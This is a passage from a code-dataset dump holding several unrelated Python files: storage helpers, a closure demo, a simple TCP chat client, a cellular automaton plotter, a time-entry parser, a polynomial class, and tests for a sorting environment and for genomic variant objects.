of a directory on storage.\n\n Parameters\n ----------\n dirname : str\n Name of the directory.\n matching : str\n Regular expression to filter files with.\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n\n Returns\n -------\n list of str\n A list with the names of the files in the directory.\n\n Raises\n ------\n FileNotFoundError\n If the specified directory does not exist.\n\n \"\"\"\n protocol, dirname = split_protocol_path(dirname)\n try:\n return adapter(protocol).listdir(dirname, matching)\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef isdir(path: str, on_error: str = 'raise') -> List[str]:\n \"\"\"Determines whether a given path refers to an existing directory.\n\n Parameters\n ----------\n path : str\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n\n Returns\n -------\n bool\n\n \"\"\"\n protocol, path = split_protocol_path(path)\n try:\n return adapter(protocol).isdir(path)\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef isfile(path: str, on_error: str = 'raise') -> List[str]:\n \"\"\"Determines whether a given path refers to an existing file.\n\n Parameters\n ----------\n path : str\n on_error : {'raise', 'log'}, optional\n Behavior in case errors happen during the process (default: ``'raise'``).\n\n Returns\n -------\n bool\n\n \"\"\"\n protocol, path = split_protocol_path(path)\n try:\n return adapter(protocol).isfile(path)\n except FileNotFoundError as error:\n handle_error(error, on_error)\n\n\ndef exists(filename: str) -> bool:\n \"\"\"Checks whether a file exists in storage\n\n Parameters\n ----------\n filename : str\n\n Returns\n -------\n bool\n\n \"\"\"\n protocol, filename = split_protocol_path(filename)\n return adapter(protocol).exists(filename)\n\n\n__all__ = [\n 'split_protocol_path', 'without_protocol', 'join_protocol_path',\n 'adapter',\n 'open', 'read', 'write', 'delete', 'copy', 'move',\n 'listdir', 'isdir', 'isfile', 'exists',\n]\n","sub_path":"ink/core/forge/joins/core/io/storage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"447334862","text":"\ndef count():\n def f(j):\n def g():\n print()\n return j*j\n print(str(g) + \"##\"*20)\n print(g)\n return g\n fs = []\n for i in range(1, 4):\n fs.append(f(i)) # f(i)立刻被执行,因此i的当前值被传入f()\n # print(str(f(i)) + \"**\"*20)\n print(fs)\n\n return fs\n\n\nf1, f2, f3 = count()\nprint(f1())\nprint(f2())\n\n#\n# a = lambda x,y:[i*i for i in range(int(x), int(y))]\n# print(a(5, 7))\n\n\ndef count():\n fs = []\n\n for i in range(1, 4):\n def f():\n print(12)\n return i*i\n # print(str(f) + \"***\")\n fs.append(f)\n print(123)\n print(f)\n print(fs)\n return fs\n\nf1, f2, f3 = count()\nprint(f1())\n","sub_path":"xitike(习题课)/xitike(第4章python高级语法)/闭包.py","file_name":"闭包.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"166077952","text":"#!/usr/bin/env python\nfrom socket import *\nimport sys\n\nHOST = '10.107.33.76'\nPORT = 21567\nBUFSIZ = 1024\nADDR = (HOST, PORT)\n\ntcpCliSock = socket(AF_INET, SOCK_STREAM)\ntcpCliSock.connect(ADDR)\n\nwhile True:\n data = input('> ')\n if not data:\n break\n tcpCliSock.send(bytes(data.encode('utf-8')))\n data = tcpCliSock.recv(BUFSIZ)\n if not data:\n break\n #print(data.encode('utf-8'))\n print(data.decode('utf-8'))\n #print(data)\ntcpCliSock.close()\n","sub_path":"77.py","file_name":"77.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"349199868","text":"import random\nimport matplotlib.pyplot as plt\nimport cv2\n\n# Number of Colors in color palette\nN = 14\n\ndef map2img(canvas, colors):\n image = np.zeros((canvas.shape[0],canvas.shape[1],3))\n for i in range(0,canvas.shape[0]):\n for j in range(0,canvas.shape[1]):\n image[i,j,:] = colors[int(canvas[i,j]),:]\n \n return image.astype(int)\n\ndef setup(size=(256,256)):\n colors = np.zeros((N,3))\n for i in range(0,N):\n colors[i,:] = [random.randint(0,255),random.randint(0,255),random.randint(0,255)]\n \n canvas = np.zeros(size)\n for i in range(0,size[0]):\n for j in range(0,size[1]):\n canvas[i,j] = int(random.randint(0,N-1))\n\n return canvas, colors\n\n\n# Cyclic Cellular Automata with threshold as 1 and Neumann Neighborhood\ndef automate_cyclic(canvas, N):\n new_can = np.zeros(canvas.shape)\n height, width = canvas.shape\n for i in range(0,height):\n for j in range(0,width):\n new_can[i,j] = canvas[i,j]\n nextValue = int(canvas[i,j]+1)%N\n if(nextValue == canvas[i, (j+1)%width] or nextValue == canvas[(i+1)%height, j] or nextValue == canvas[(i-1+height)%height, j] or nextValue == canvas[i, (j-1+width)%width]):\n new_can[i,j] = nextValue\n return new_can\n\ncanvas, colors = setup()\n\nfor i in range(0,1000):\n canvas = automate_cyclic(canvas,N)\n img = map2img(canvas, colors)\n if (i%50==0):\n plt.figure(figsize = (5,5))\n plt.imshow(img.astype(int))\n plt.show(block=False)\n plt.pause(0.1)\n plt.close() \n\n\n\n","sub_path":"Two_Dimensional_CA/Code/Cyclic CA/Cyclic_cellular_Automata_basic.py","file_name":"Cyclic_cellular_Automata_basic.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"622556340","text":"import re\nimport datetime\n\nclass Entry(object):\n\n def is_today(self):\n if self.date==datetime.datetime.today().date():\n return True\n else:\n return False\n\n def days_old(self):\n if not self.date: \n return 999999\n else:\n delta = datetime.date.today() - self.date\n return delta.days\n\n\n def is_date(self,input_string):\n match = re.search(r'\\d{2}/\\d{2}/\\d{2}', input_string)\n if match:\n testdate = datetime.datetime.strptime(match.group(), '%d/%m/%y').date()\n if testdate==self.date:\n return True\n else:\n return False\n else:\n raise ValueException(\"Date string is badly formed\") \n return False #should never be here\n\n\n def __init__(self, input_string):\n import types\n if isinstance(input_string, str):\n pass\n else: \n raise ValueError(\"Input to constructor wasn't a string\") \n try:\n self.input_string=input_string\n match = re.search(r'\\d{2}/\\d{2}/\\d{2}', input_string)\n if match:\n self.date = datetime.datetime.strptime(match.group(), '%d/%m/%y').date()\n else:\n self.date = None\n self.start=None\n self.end=None\n match = re.search(r'(?P\\d{2}:\\d{2}) to (?P\\d{2}:\\d{2})', input_string)\n if match:\n self.start = match.group('start')\n self.end = match.group('end')\n else:\n match = re.search(r'(?P\\d{2}:\\d{2})', input_string)\n if match:\n self.start = match.group('start')\n self.end = self.start\n else:\n raise ValueError(\"No Start value found on: {}\".format(input_string))\n match = re.search(r',\\s*(?P.*)', input_string)\n self.title=None\n if match:\n self.title =match.group(\"title\").strip()\n if self.title==None:\n print(\"Warning: NO title for {}\".format(self))\n self.title=\"\"\n\n except AttributeError as err:\n print(\"Exception! On this line:\")\n print(input_string)\n raise err\n\n def start_epoch(self):\n time=self.start_datetime()\n epoch = time.timestamp()\n return epoch\n\n\n\n\n def end_epoch(self):\n time=self.end_datetime()\n epoch = time.timestamp()\n return epoch\n\n def start_datetime(self):\n from datetime import datetime\n FMT = '%Y-%m-%d%H:%M'\n return datetime.strptime(str(self.date) + self.start, FMT) \n \n def end_datetime(self):\n if self.end==None:\n self.end=self.start\n from datetime import datetime\n FMT = '%Y-%m-%d%H:%M'\n return datetime.strptime(str(self.date) + self.end, FMT) \n\n def get_duration(self):\n #from https://stackoverflow.com/a/3096984/170243\n from datetime import datetime\n FMT = '%H:%M'\n tdelta = datetime.strptime(self.end, FMT) - datetime.strptime(self.start, FMT)\n return tdelta.total_seconds()/60 #returns in minutes\n\n\n\n def __str__(self):\n return self.input_string\n\n","sub_path":"entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"33035646","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n__author__ = 'Yee_172'\n__date__ = '2017/8/28'\n\n# from copy import deepcopy\nfrom functools import reduce\nfrom decimal import Decimal\n\ndef ftoi(num):\n \"\"\"\n Float to int if it has no decimal\n 1.0 -> 1\n \"\"\"\n return int(num) if int(num) == num else num\n\n\ndef dtos(num):\n \"\"\"\n Digit to Simply digit\n 1.0000000000001 -> 1\n \"\"\"\n return ftoi(round(num, 10))\n\n\ndef stos(string):\n \"\"\"\n String to Simply digit\n '1.0000000000001' -> 1\n \"\"\"\n return dtos(float(string))\n\n\nclass Indeterminate:\n \"\"\"\n A member of the Term\n \"\"\"\n\n def __init__(self, unknown, subscript=None, degree=1.0):\n if not isinstance(unknown, str):\n raise Exception('Name of Indeterminate must be string!')\n if not isinstance(subscript, str) and subscript is not None:\n raise Exception('Subscript must be string!')\n if isinstance(degree, bool) or isinstance(degree, str):\n raise Exception('Degree must be int or float!')\n\n if degree:\n self.unknown = unknown\n self.subscript = subscript\n self.degree = dtos(degree)\n else:\n self.unknown = ''\n self.subscript = None\n self.degree = 0\n\n def tolist(self):\n \"\"\"\n Return a list of its info\n \"\"\"\n return [self.unknown, self.subscript, self.degree]\n\n def __str__(self):\n \"\"\"\n Return a string means the same\n \"\"\"\n if not self.unknown:\n return '1'\n elif self.degree == 1:\n if self.subscript:\n return '%s_%s' % (self.unknown, self.subscript)\n else:\n return self.unknown\n else:\n if self.subscript:\n return '%s_%s^%s' % (self.unknown, self.subscript, str(self.degree))\n else:\n return '%s^%s' % (self.unknown, str(self.degree))\n\n def latex(self):\n \"\"\"\n Return a latex form\n \"\"\"\n if not self.unknown:\n return '1'\n elif self.degree == 1:\n if self.subscript:\n return '%s$_{%s}$' % (self.unknown, self.subscript)\n else:\n return self.unknown\n else:\n if self.subscript:\n return '%s$_{%s}^{%s}$' % (self.unknown, self.subscript, str(self.degree))\n else:\n return '%s$^{%s}$' % (self.unknown, str(self.degree))\n\n def showdetail(self, spaces=0):\n \"\"\"\n Print detailed info\n \"\"\"\n if not isinstance(spaces, int):\n raise Exception('The number of spaces must be integer!')\n\n print(' ' * spaces + 'unknown :\\t %s' % self.unknown)\n print(' ' * spaces + 'subscript:\\t %s' % self.subscript)\n print(' ' * spaces + 'degree :\\t %s' % str(self.degree))\n\n def __eq__(self, other):\n \"\"\"\n Judge if two Indeterminates are equal\n \"\"\"\n if not isinstance(other, Indeterminate):\n raise Exception('Must compare with an Indeterminate!')\n\n if self.unknown == other.unknown:\n if self.subscript == other.subscript:\n if self.degree == other.degree:\n return True\n return False\n\n # def __copy__(self):\n # \"\"\"\n # Return a copy of itself\n # \"\"\"\n # return Indeterminate(self.unknown, self.subscript, self.degree)\n\n def ismultiplicative(self, other):\n \"\"\"\n Judge if two Indeterminates can multiply\n \"\"\"\n if not isinstance(other, Indeterminate):\n raise Exception('Must compare with an Indeterminate!')\n\n if self == CONSTANT or other == CONSTANT:\n return True\n if self.unknown == other.unknown:\n if self.subscript == other.subscript:\n return True\n return False\n\n def __mul__(self, other):\n \"\"\"\n Multiply two multiplicative Indeterminates\n I1 * I2\n \"\"\"\n if not isinstance(other, Indeterminate):\n raise Exception('Indeterminate must be valid!')\n if not self.ismultiplicative(other):\n raise Exception('Multiplicative Indeterminate acquired!')\n\n if self == CONSTANT:\n return Indeterminate(other.unknown, other.subscript, other.degree)\n degree = self.degree + other.degree\n return Indeterminate(self.unknown, self.subscript, degree) if degree else CONSTANT\n\n def __truediv__(self, other):\n \"\"\"\n Divide an Indeterminate by another\n I1 / I2\n \"\"\"\n return self * Indeterminate(other.unknown, other.subscript, -other.degree)\n\n\nCONSTANT = Indeterminate('', degree=0)\n\n\nclass Term:\n \"\"\"\n A member of the Polynomial\n \"\"\"\n\n def __init__(self, *indeterminates, coefficient=1.0):\n if isinstance(coefficient, bool) or isinstance(coefficient, str):\n raise Exception('Coefficient must be valid!')\n for each in indeterminates:\n if not isinstance(each, Indeterminate):\n raise Exception('Each Indeterminate must be valid!')\n\n # Sort the indeterminates by indeterminate and subscript\n indeterminates = sorted(indeterminates, key=lambda x: x.subscript or '')\n indeterminates = sorted(indeterminates, key=lambda x: x.unknown)\n index = 0\n while 1:\n if index >= len(indeterminates) - 1:\n break\n try:\n middle = indeterminates[index] * indeterminates[index + 1]\n if middle == CONSTANT:\n indeterminates = indeterminates[:index] + indeterminates[index + 2:]\n else:\n indeterminates = indeterminates[:index] + [middle] + indeterminates[index + 2:]\n except:\n index += 1\n\n if coefficient:\n self.indeterminates = indeterminates or [CONSTANT]\n self.coefficient = dtos(coefficient)\n self.degree = dtos(sum(each.degree for each in indeterminates))\n else:\n self.indeterminates = [CONSTANT]\n self.coefficient = 0\n self.degree = 0\n\n def tolist(self):\n \"\"\"\n Return a list of its info\n \"\"\"\n return [[each.tolist() for each in self.indeterminates], self.coefficient, self.degree]\n\n def __str__(self):\n \"\"\"\n Return a string means the same\n \"\"\"\n if not self.degree:\n return '%s' % str(self.coefficient)\n else:\n string = '' if self.coefficient == 1 else '-' if self.coefficient == -1 else str(self.coefficient)\n string += '*'.join(str(each) for each in self.indeterminates)\n return string\n\n def latex(self):\n \"\"\"\n Return a latex form\n \"\"\"\n if not self.degree:\n return '%s' % str(self.coefficient)\n else:\n string = '' if self.coefficient == 1 else '-' if self.coefficient == -1 else str(self.coefficient)\n string += ''.join(each.latex() for each in self.indeterminates)\n return string\n\n def showdetail(self, spaces=0):\n \"\"\"\n Print detailed info\n \"\"\"\n print(' ' * spaces + 'number of Indeterminates:\\t %d' % len(self.indeterminates))\n print(' ' * spaces + 'coefficient :\\t %s' % str(self.coefficient))\n print(' ' * spaces + 'degree :\\t %s' % str(self.degree))\n for n, each in enumerate(self.indeterminates):\n print(' ' * spaces + 'Indeterminate #%02d:' % (n + 1))\n each.showdetail(5 + spaces)\n\n def __eq__(self, other):\n \"\"\"\n Judge if two Terms are equal\n \"\"\"\n if not isinstance(other, Term):\n raise Exception('Must compare with a Term!')\n\n if self.coefficient == other.coefficient:\n if self.degree == other.degree:\n if self.indeterminates == other.indeterminates:\n return True\n return False\n\n def isincreasable(self, other):\n \"\"\"\n Judge if two Terms is increasable\n \"\"\"\n if not isinstance(other, Term):\n raise Exception('Must compare with a Term!')\n\n if self == ZERO_TERM or other == ZERO_TERM:\n return True\n if self.degree == other.degree:\n if len(self.indeterminates) == len(other.indeterminates):\n for n, each in enumerate(other.indeterminates):\n if self.indeterminates[n] != each:\n return False\n return True\n return False\n\n def __neg__(self):\n \"\"\"\n Return negative Term\n - T1\n \"\"\"\n return Term(*self.indeterminates, coefficient=-self.coefficient)\n\n def __add__(self, other):\n \"\"\"\n Add two Terms\n T1 + T2\n \"\"\"\n if not isinstance(other, Term):\n raise Exception('Must add with a Term!')\n if not self.isincreasable(other):\n raise Exception('Increasable Term acquired!')\n\n if self == ZERO_TERM:\n return Term(*other.indeterminates, coefficient=other.coefficient)\n return Term(*self.indeterminates, coefficient=self.coefficient + other.coefficient)\n\n def __sub__(self, other):\n \"\"\"\n Subtract two Terms\n T1 - T2\n \"\"\"\n return -other + self\n\n def __mul__(self, other):\n \"\"\"\n Multiply two Terms\n T1 * T2\n \"\"\"\n if not isinstance(other, Term):\n raise Exception('Term acquired')\n\n indeterminates = self.indeterminates + other.indeterminates\n return Term(*indeterminates, coefficient=self.coefficient * other.coefficient)\n\n def __truediv__(self, other):\n \"\"\"\n Divide two Terms\n T1 / T2\n \"\"\"\n return self * Term(*[CONSTANT / each for each in other.indeterminates], coefficient=1 / other.coefficient)\n\n\nZERO_TERM = Term(coefficient=0)\n\n\nclass Polynomial:\n \"\"\"\n A set of terms\n \"\"\"\n\n def __init__(self, *terms):\n for each in terms:\n if not isinstance(each, Term):\n raise Exception('Each Term must be valid!')\n\n # Sort the terms by degree and number of Indeterminates\n terms = sorted(terms, key=lambda x: str(Term(*x.indeterminates)))\n terms = sorted(terms, key=lambda x: len(x.indeterminates))\n terms = sorted(terms, key=lambda x: x.degree, reverse=True)\n index = 0\n while 1:\n if index >= len(terms) - 1:\n break\n try:\n middle = terms[index] + terms[index + 1]\n if middle == ZERO_TERM:\n terms = terms[:index] + terms[index + 2:]\n else:\n terms = terms[:index] + [middle] + terms[index + 2:]\n except:\n index += 1\n\n terms = terms or [ZERO_TERM]\n self.terms = terms\n self.degree = terms[0].degree\n\n def tolist(self):\n \"\"\"\n Return a list of its info\n \"\"\"\n return [[each.tolist() for each in self.terms], self.degree]\n\n def __str__(self):\n \"\"\"\n Return a string means the same\n \"\"\"\n string = '+'.join(str(each) for each in self.terms).replace('+-', '-')\n return string[1:] if string[0] == '+' else string\n\n def latex(self):\n \"\"\"\n Return a latex form\n \"\"\"\n string = '+'.join(each.latex() for each in self.terms).replace('+-', '-')\n return string[1:] if string[0] == '+' else string\n\n def showdetail(self, spaces=0):\n \"\"\"\n Print detailed info\n \"\"\"\n print(' ' * spaces + 'number of Terms:\\t %d' % len(self.terms))\n print(' ' * spaces + 'degree :\\t %s' % str(self.degree))\n for n, each in enumerate(self.terms):\n print(' ' * spaces + 'Term #%02d:' % (n + 1))\n each.showdetail(5 + spaces)\n\n def __eq__(self, other):\n \"\"\"\n Judge if two Polynomials are equal\n P1 == P2\n \"\"\"\n if not isinstance(other, Polynomial):\n raise Exception('Must compare with a Polynomial!')\n\n if self.terms == other.terms:\n return True\n return False\n\n def __neg__(self):\n \"\"\"\n Return negative Polynomial\n - P1\n \"\"\"\n return Polynomial(*[-each for each in self.terms])\n\n def __add__(self, other):\n \"\"\"\n Add polynomials together\n P1 + P2\n \"\"\"\n if not isinstance(other, Polynomial):\n if not isinstance(other, int):\n if not isinstance(other, float):\n raise Exception('Each Polynomial must be valid!')\n\n try:\n other = Polynomial(Term(CONSTANT, coefficient=other))\n finally:\n terms = self.terms + other.terms\n return Polynomial(*terms)\n\n __radd__ = __add__\n\n def __sub__(self, other):\n \"\"\"\n Subtract two Polynomials\n P1 - P2\n \"\"\"\n if not isinstance(other, Polynomial):\n if not isinstance(other, int):\n if not isinstance(other, float):\n if not isinstance(other, Decimal):\n raise Exception('Each Polynomial must be valid!')\n\n try:\n other = Polynomial(Term(CONSTANT, coefficient=other))\n finally:\n return -other + self\n\n def __rsub__(self, other):\n \"\"\"\n Constant minus Polynomial\n P2 - P1\n \"\"\"\n if not isinstance(other, int) and not isinstance(other, float):\n raise Exception('Valid constant required!')\n\n return -self + other\n\n def __mul__(self, other):\n \"\"\"\n Multiply two Polynomials\n P1 * P2\n \"\"\"\n if not isinstance(other, Polynomial):\n if not isinstance(other, int):\n if not isinstance(other, float):\n if not isinstance(other, Decimal):\n raise Exception('Each Polynomial must be valid!')\n\n try:\n other = Polynomial(Term(CONSTANT, coefficient=other))\n finally:\n terms = []\n for each in other.terms:\n terms += [_each * each for _each in self.terms]\n return Polynomial(*terms)\n\n __rmul__ = __mul__\n\n def __truediv__(self, other):\n \"\"\"\n Divide two Polynomials\n P1 / P2\n \"\"\"\n if not isinstance(other, int) and not isinstance(other, float) and not isinstance(other, Decimal):\n raise Exception('Not supported yet!')\n try:\n return self * (1 / other)\n except:\n raise Exception('Valid constant required!')\n # TODO __truediv__\n\n def __pow__(self, power, modulo=None):\n \"\"\"\n Power a Polynomial\n P1 ** power\n \"\"\"\n if not isinstance(power, int) or power < 0:\n raise Exception('Power must be nonnegative integer!')\n\n return reduce(lambda x, y: x * y, [self] * power, 1)\n\n\n# ---[test zone]---\n# a = Indeterminate('x', subscript='1', degree=1)\n# b = Indeterminate('y', subscript='3', degree=2)\n# c = Indeterminate('x', subscript='2', degree=4)\n# d = Indeterminate('x', subscript='1', degree=1)\n# T1 = Term(a, b, c, a, coefficient=5)\n# T2 = Term(a, a, b, coefficient=3)\n# T3 = Term(c, c, coefficient=4)\n# T4 = Term(coefficient=-1)\n# T5 = Term(a, b, d)\n# P1 = Polynomial(T2, T1, T3, T4)\n# P2 = Polynomial(T2, T3)\n# print(P1.latex())\n","sub_path":"Element.py","file_name":"Element.py","file_ext":"py","file_size_in_byte":15553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"38909994","text":"import pytest\nfrom gym.spaces import flatten\n\nfrom sorting_gym.agents.scripted import bubble_sort_agent, insertion_sort_agent, quicksort_agent\nfrom sorting_gym.envs.functional_neural_sort_interface import FunctionalNeuralSortInterfaceEnv\nfrom tests.util import _test_sort_agent\n\n\ndef test_reset_gives_valid_observation():\n env = FunctionalNeuralSortInterfaceEnv(k=4, number_of_functions=5)\n obs = flatten(env.nested_observation_space, env.reset())\n assert obs.shape[0] == 68 + 5 + 6 + 51 + 1\n\n\ndef test_function_env_preserves_function_id():\n \"\"\"\n Create a functional environment with 2 functions taking 0 args and returning 0 args\n \"\"\"\n env = FunctionalNeuralSortInterfaceEnv(k=3, number_of_functions=2, function_inputs=0, function_returns=0)\n original_obs = env.reset()\n assert original_obs['current_function'] == -1\n assert env.action_space.contains((3, 0))\n obs, reward, done, info = env.step((3, 0))\n assert obs['current_function'] == 0\n obs, reward, done, info = env.step((3, 1))\n assert obs['current_function'] == 1\n # return\n obs, reward, done, info = env.step((4,))\n assert obs['current_function'] == 0\n obs, reward, done, info = env.step((4,))\n assert obs['current_function'] == -1\n\n\ndef test_function_env_can_pass_through_arg():\n \"\"\"\n Functional environment with 1 function taking 1 arg and returning 1 arg\n We will create a function that assigns the input to a local variable, and\n returns that local variable.\n \"\"\"\n env = FunctionalNeuralSortInterfaceEnv(k=3, number_of_functions=1, function_inputs=1, function_returns=1)\n env.reset()\n n = len(env.A) - 1\n assert env.current_function == -1\n assert env.v[1] == n\n assert env.v[2] == 0\n # Call the function 0 with:\n # local variable ID l=0\n # outer variable ID o=1 (pointing to end of array)\n # returning ID r=2\n obs, reward, done, info = env.step((3, 0, 0, 1, 2))\n assert obs['current_function'] == 0\n assert env.v[1] == 0\n assert env.v[2] == 0\n # Now inside the function assign \"local\" variable (id 1) with the function input (id 0)\n # Which should be our locally passed in end of array pointer\n obs, reward, done, info = env.step((2, 1, 0))\n assert env.v[1] == n\n assert env.v[2] == 0\n # Now return from the function with local variable (id 1).\n # Returning ID is 2, so now v[2] should be n\n obs, reward, done, info = env.step((4, 1))\n assert env.v[2] == n\n\n\ndef test_function_env_swap_args():\n \"\"\"\n Functional environment with 1 function taking 2 arg and returning 2 args\n We will create a function that swaps the inputs.\n \"\"\"\n env = FunctionalNeuralSortInterfaceEnv(k=3, number_of_functions=1, function_inputs=2, function_returns=2)\n env.reset()\n n = len(env.A) - 1\n assert env.current_function == -1\n env.v[1] = 1\n env.v[2] = 2\n # Call the function\n obs, reward, done, info = env.step((3, 0,\n 0, 1, # local inputs\n 1, 2, # outer variables\n 1, 2 # write over inputs\n ))\n assert obs['current_function'] == 0\n assert env.v[0] == 1\n assert env.v[1] == 2\n\n # Swap the \"local\" variables\n # Save temp var (id 2) with the first function input (id 0)\n obs, reward, done, info = env.step((2, 2, 0))\n # Assign v0 = v1\n obs, reward, done, info = env.step((2, 0, 1))\n # Assign v1 = v2\n obs, reward, done, info = env.step((2, 1, 2))\n\n assert env.v[0] == 2\n assert env.v[1] == 1\n\n # Now return from the function.\n obs, reward, done, info = env.step((4, 0, 1))\n\n # Check that the outer scope has had the variables swapped\n assert env.v[1] == 2\n assert env.v[2] == 1\n\n\ndef test_function_env_swap_args_in_call():\n \"\"\"\n Functional environment with 1 function taking 2 arg and returning 2 args\n We will create a nop function that swaps the inputs by swapping the return args.\n \"\"\"\n env = FunctionalNeuralSortInterfaceEnv(k=3, number_of_functions=1, function_inputs=2, function_returns=2)\n env.reset()\n n = len(env.A) - 1\n assert env.current_function == -1\n env.v[1] = 1\n env.v[2] = 2\n # Call the function\n obs, reward, done, info = env.step((3, 0,\n 0, 1, # local inputs\n 1, 2, # outer variables\n 1, 2 # write over inputs\n ))\n assert obs['current_function'] == 0\n assert env.v[0] == 1\n assert env.v[1] == 2\n\n # Now return from the function - swapping the return values around\n obs, reward, done, info = env.step((4, 1, 0))\n\n # Check that the outer scope has had the variables swapped\n assert env.v[1] == 2\n assert env.v[2] == 1\n\n\ndef test_bubble_sort_agent():\n \"\"\"\n Functional environment should still work using the scripted\n Bubble Sort agent.\n \"\"\"\n env = FunctionalNeuralSortInterfaceEnv(k=3)\n agent_f = bubble_sort_agent\n _test_sort_agent(agent_f, env, 100)\n\n\ndef test_bubble_sort_agent_not_enough_pointers():\n env = FunctionalNeuralSortInterfaceEnv(k=2)\n agent_f = bubble_sort_agent\n with pytest.raises(IndexError):\n _test_sort_agent(agent_f, env, 100)\n\n\ndef test_quick_sort_agent():\n \"\"\"\n Tests the environment using a Quick Sort agent.\n\n c.f. Algorithm 8 - pg 25\n \"\"\"\n env = FunctionalNeuralSortInterfaceEnv(k=4, number_of_functions=2)\n _test_sort_agent(quicksort_agent, env, number_of_problems=100, max_steps=10000, verbose=True)\n","sub_path":"tests/test_function_env.py","file_name":"test_function_env.py","file_ext":"py","file_size_in_byte":5640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"643868822","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nresponses={}\npolling_active=True\nwhile polling_active:\n name=raw_input(\"\\nWhat's your name?\")\n response=raw_input(\"Which mountain would you like to climb someday?\")\n responses[name]=response\n\n repeat=raw_input(\"yes/no?\")\n if repeat=='no':\n polling_active=False\nprint(\"\\n---Poll results---\")\nfor name,response in responses.items():\n print(name.title()+\" would like to climb \"+response.title()+\".\")","sub_path":"jichu/input1.py","file_name":"input1.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"508820999","text":"# Copyright (c) 2015. Mount Sinai School of Medicine\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nTest simple properties of Variant objects, such as their trimming\nof shared prefix/suffix strings from ref/alt fields.\n\"\"\"\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\nfrom pyensembl import ensembl77\nfrom varcode import Variant\nfrom nose.tools import eq_\n\ndef test_insertion_shared_prefix():\n variant = Variant(1, start=10, ref=\"AA\", alt=\"AAT\")\n eq_(variant.contig, \"1\")\n eq_(variant.original_ref, \"AA\")\n eq_(variant.original_alt, \"AAT\")\n eq_(variant.original_start, 10)\n # since this variant is just an insertion of a \"T\", get rid of\n # the prefix context\n eq_(variant.ref, \"\")\n eq_(variant.alt, \"T\")\n # the [start,end] interval for an insertion is just the base we're\n # inserting after, which in this case is the 11th position\n eq_(variant.start, 11)\n eq_(variant.end, 11)\n eq_(variant.short_description, \"chr1 g.11_12insT\")\n\ndef test_insertion_no_prefix():\n variant = Variant(1, start=11, ref=\"\", alt=\"T\")\n eq_(variant.contig, \"1\")\n eq_(variant.original_ref, \"\")\n eq_(variant.original_alt, \"T\")\n eq_(variant.original_start, 11)\n eq_(variant.ref, \"\")\n eq_(variant.alt, \"T\")\n eq_(variant.start, 11)\n eq_(variant.end, 11)\n eq_(variant.short_description, \"chr1 g.11_12insT\")\n\ndef test_substitution_no_prefix():\n variant = Variant(1, start=11, ref=\"A\", alt=\"T\")\n eq_(variant.contig, \"1\")\n eq_(variant.original_ref, \"A\")\n eq_(variant.original_alt, \"T\")\n eq_(variant.original_start, 11)\n eq_(variant.ref, \"A\")\n eq_(variant.alt, \"T\")\n eq_(variant.start, 11)\n eq_(variant.end, 11)\n eq_(variant.short_description, \"chr1 g.11A>T\")\n\n\ndef test_substitution_shared_prefix():\n variant = Variant(1, start=10, ref=\"AA\", alt=\"AT\")\n eq_(variant.contig, \"1\")\n eq_(variant.original_ref, \"AA\")\n eq_(variant.original_alt, \"AT\")\n eq_(variant.original_start, 10)\n eq_(variant.ref, \"A\")\n eq_(variant.alt, \"T\")\n eq_(variant.start, 11)\n eq_(variant.end, 11)\n eq_(variant.short_description, \"chr1 g.11A>T\")\n\n\ndef test_deletion_shared_suffix():\n variant = Variant(1, start=10, ref=\"AAC\", alt=\"C\")\n eq_(variant.contig, \"1\")\n eq_(variant.original_ref, \"AAC\")\n eq_(variant.original_alt, \"C\")\n eq_(variant.original_start, 10)\n eq_(variant.ref, \"AA\")\n eq_(variant.alt, \"\")\n eq_(variant.start, 10)\n eq_(variant.end, 11)\n eq_(variant.short_description, \"chr1 g.10_11delAA\")\n\n\ndef test_deletion_no_suffix():\n variant = Variant(1, start=10, ref=\"AA\", alt=\"\")\n eq_(variant.contig, \"1\")\n eq_(variant.original_ref, \"AA\")\n eq_(variant.original_alt, \"\")\n eq_(variant.original_start, 10)\n eq_(variant.ref, \"AA\")\n eq_(variant.alt, \"\")\n eq_(variant.start, 10)\n eq_(variant.end, 11)\n eq_(variant.short_description, \"chr1 g.10_11delAA\")\n\ndef test_serialization():\n variants = [\n Variant(\n 1, start=10, ref=\"AA\", alt=\"AAT\", ensembl=ensembl77),\n Variant(10, start=15, ref=\"A\", alt=\"G\"),\n Variant(20, start=150, ref=\"\", alt=\"G\"),\n ]\n for original in variants:\n # This causes the variant's ensembl object to make a SQL connection,\n # which makes the ensembl object non-serializable. By calling this\n # method, we are checking that we don't attempt to directly serialize\n # the ensembl object.\n original.effects()\n\n # Test pickling.\n serialized = pickle.dumps(original)\n reconstituted = pickle.loads(serialized)\n assert original == reconstituted\n\n assert original.contig == reconstituted.contig\n assert 